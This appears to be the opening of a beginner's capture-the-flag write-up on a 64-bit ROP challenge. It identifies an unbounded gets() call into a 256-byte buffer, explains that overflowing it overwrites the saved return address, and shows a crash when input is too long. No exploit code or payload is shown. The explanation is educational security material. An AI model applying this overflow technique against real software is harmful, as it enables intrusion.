64-bit ROP | You rule 'em all!

Solving a ROP on 64-bit challenge :grinning:

In the name of Allah, the most beneficent, the most merciful.

###Before i begin this article, i want to thank @_py for showing me this beautiful community :yum:

• This article is for learning purposes… :slight_smile:
  • Hello everybody, this my first article ever, i’m not really good at explaining things… But still, i will try making everything clear for you…
  • So in this task we were given a binary, and its source code… So the first thing is that we should identify the bug, and try to do something with it…
  • Also one thing to keep in mind, the binary does read our input and print it in hexadecimal.

The following lines seem interesting…

char buffer[256];
gets(buffer);

So we have an array named buffer, which size is 256.
and then comes a call to gets();

gets() reads a line from stdin into the buffer pointed to by s until either a terminating newline or EOF, which it replaces with a null byte (aq\0aq).

uhm, so it will read from stdin, until it gets newline. “\x0a”

Seems just perfect. so it will take our input, and stores it in buffer, one question that comes to our mind now…
What if the size of our input was > sizeof(buffer);

• The answer is that we’ll overwrite the value of saved RIP.

mean that we control the flow of the program…

Let’s try that in the real challenge now…

Let’s first download the binary…

Then let’s try to do what we talked about, making the size of input bigger than the size of the array:

Interesting, we got Segmentation fault, which is actually a signal…

In computing, a segmentation fault (often shortened to segfault) or access violation is a fault, or failure condition, raised by hardware with memory protection, notifying an operating system (OS) the software has attempted to access a restricted area of memory (a memory access violation).